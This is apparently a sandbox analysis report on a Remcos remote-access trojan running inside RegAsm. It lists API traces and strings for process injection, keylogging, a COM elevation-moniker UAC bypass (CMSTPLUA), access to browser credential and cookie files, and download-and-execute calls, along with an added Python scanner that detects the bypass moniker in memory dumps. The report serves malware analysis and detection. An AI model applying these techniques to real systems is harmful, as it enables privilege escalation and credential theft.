                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                • API String ID: 3756808967-1743721670
                                                                • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                • API String ID: 0-1861860590
                                                                • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040755C
                                                                • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Object_wcslen
                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                • API String ID: 240030777-3166923314
                                                                • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
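The block above is the UAC bypass the report flags as "CMSTPLUA": CoGetObject is handed a wide string built from the elevation moniker prefix "Elevation:Administrator!new:" and the CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, which makes COM start that server elevated without a prompt. The two pieces appear as separate strings in the dump, so a scanner that only looks for the fully assembled moniker can miss it. The following Python is an added example written for this page (not Joe Sandbox or sample code): it extracts ASCII and UTF-16LE strings from a memory-dump byte buffer and reports both a contiguous moniker and the split prefix-plus-CLSID case. The dump bytes are constructed for the example and are not taken from the sample's memory; the assumption that the moniker is stored UTF-16LE follows from CoGetObject taking a wide string and the _wcslen call beside it.

```python
"""Find COM elevation monikers (as passed to CoGetObject) in a memory dump.

Added example, not code from Joe Sandbox or from the Remcos sample.
"""
import re
from typing import Dict, List

# Strings from the report above: the moniker prefix and the CMSTPLUA CLSID.
MONIKER_PREFIX = "Elevation:Administrator!new:"
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

GUID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", re.I)


def extract_strings(blob: bytes, min_len: int = 6) -> List[str]:
    """Return printable ASCII strings and UTF-16LE strings found in blob."""
    found: List[str] = []
    # Runs of printable ASCII bytes.
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        found.append(m.group().decode("ascii"))
    # Runs of printable code units in UTF-16LE (each char followed by NUL).
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob):
        found.append(m.group().decode("utf-16-le"))
    return found


def find_elevation_monikers(blob: bytes) -> Dict[str, object]:
    """Report moniker prefix, GUIDs and whether the CMSTPLUA pair is present.

    A fully built moniker ("Elevation:Administrator!new:{...}") is returned in
    full_monikers. When the binary keeps the prefix and CLSID as separate
    strings and concatenates them at runtime, the two parts are matched
    independently and the bypass is still flagged.
    """
    strings = extract_strings(blob)
    prefix_hits = [s for s in strings if MONIKER_PREFIX.lower() in s.lower()]
    full = sorted({g.upper() for s in prefix_hits for g in GUID_RE.findall(s)})
    clsids = sorted({g.upper() for s in strings for g in GUID_RE.findall(s)})
    return {
        "moniker_prefix_present": bool(prefix_hits),
        "full_monikers": full,
        "clsids_present": clsids,
        "cmstplua_uac_bypass": bool(prefix_hits) and CMSTPLUA_CLSID in clsids,
    }


def _wide(s: str) -> bytes:
    """Encode a string as a NUL-terminated UTF-16LE buffer."""
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed dump fragment: padding, ANSI log strings, and the moniker
# split into a wide prefix and a wide CLSID, as the report's strings suggest.
SAMPLE_DUMP = (
    b"\x90" * 16
    + b"[+] ucmAllocateElevatedObject\x00"
    + b"\x00" * 7
    + _wide(MONIKER_PREFIX)
    + b"\xcc" * 5
    + _wide(CMSTPLUA_CLSID)
    + b"[+] CoGetObject SUCCESS\x00"
    + b"\x00" * 9
)

if __name__ == "__main__":
    for key, value in find_elevation_monikers(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

Run it against a real process dump (for example the RegAsm region listed under Memory Dump Source) by reading the file into `blob`; any GUID that shows up next to the prefix is the COM server being asked to start elevated, and is worth checking against the auto-elevate COM classes on the host even when it is not CMSTPLUA.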
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                • GetLastError.KERNEL32 ref: 0041A84C
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                • String ID:
                                                                • API String ID: 3587775597-0
                                                                • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                • String ID: JD$JD$JD
                                                                • API String ID: 745075371-3517165026
                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 1164774033-405221262
                                                                • Opcode ID: f2da73c484f202d7703831838b7ab11600cf4b2b9c4a90d68e51a9d5948ffb1b
                                                                • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                • Opcode Fuzzy Hash: f2da73c484f202d7703831838b7ab11600cf4b2b9c4a90d68e51a9d5948ffb1b
                                                                • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                • String ID:
                                                                • API String ID: 2341273852-0
                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$CreateFirstNext
                                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                                • API String ID: 341183262-3812160132
                                                                • Opcode ID: 0115e9c2cb1ce588966712d627a94d89128a79b5abd3d317653916e724f96c97
                                                                • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                • Opcode Fuzzy Hash: 0115e9c2cb1ce588966712d627a94d89128a79b5abd3d317653916e724f96c97
                                                                • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                • String ID:
                                                                • API String ID: 1888522110-0
                                                                • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                APIs
                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                • API String ID: 2127411465-314212984
                                                                APIs
                                                                • _free.LIBCMT ref: 00449292
                                                                • _free.LIBCMT ref: 004492B6
                                                                • _free.LIBCMT ref: 0044943D
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 00449609
                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 314583886-0
                                                                APIs
                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                • API String ID: 1589313981-2876530381
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                Strings
                                                                • UserProfile, xrefs: 0040BA59
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                • API String ID: 2018770650-1062637481
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeShutdownPrivilege
                                                                • API String ID: 3534403312-3733053543
                                                                APIs
                                                                • API ID: __floor_pentium4
                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                • API String ID: 4168288129-2761157908
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                • String ID:
                                                                • API String ID: 1824512719-0
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                • String ID:
                                                                • API String ID: 276877138-0
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                APIs
                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID: SETTINGS
                                                                • API String ID: 3473537107-594951305
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                • String ID:
                                                                • API String ID: 1157919129-0
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                • String ID:
                                                                • API String ID: 1771804793-0
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                • API ID: DownloadExecuteFileShell
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                • API String ID: 2825088817-3056885514
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • API ID: FileFind$FirstNextsend
                                                                • String ID: XPG$XPG
                                                                • API String ID: 4113138495-1962359302
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                • API String ID: 4127273184-3576401099
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                • String ID:
                                                                • API String ID: 4212172061-0
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: p'E$JD
                                                                • API String ID: 1084509184-908320845
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
